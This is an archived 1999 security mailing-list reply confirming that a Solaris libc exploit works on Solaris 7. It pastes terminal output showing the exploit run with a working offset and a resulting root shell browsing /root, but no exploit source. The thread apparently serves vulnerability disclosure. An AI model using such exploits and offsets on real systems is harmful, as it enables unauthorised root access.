Re: Solaris libc exploit

From: Cliff (cliffoat_private)
Date: Sun May 23 1999 - 20:09:05 PDT

Next message: Mnemonix: "Exploit and Analysis of the Winhlp32.exe buffer overrun."

Previous message: Ryan Russell: "Re: NetBSD Security Advisory 1999-010"
Maybe in reply to: UNYUN@ShadowPenguinSecurity: "Solaris libc exploit"
Next in thread: Aleph One: "Re: Solaris libc exploit"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Works nicely on Solaris7 / sun4u using acpizer's modified source and the
offsets listed...

nowhere:~/temp/crack$ ./a.out 7160
jumping address : ffbedf10,  offset = 7160
# uname -a
SunOS nowhere 5.7 Generic sun4u sparc sun4u
# ls -al /
.
.
.
drwx------  17 root     root        1536 May 23 00:18 root
.
.
.
# cd /root
# pwd
/root
#

Next message: Mnemonix: "Exploit and Analysis of the Winhlp32.exe buffer overrun."
Previous message: Ryan Russell: "Re: NetBSD Security Advisory 1999-010"
Maybe in reply to: UNYUN@ShadowPenguinSecurity: "Solaris libc exploit"
Next in thread: Aleph One: "Re: Solaris libc exploit"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:46:37 PDT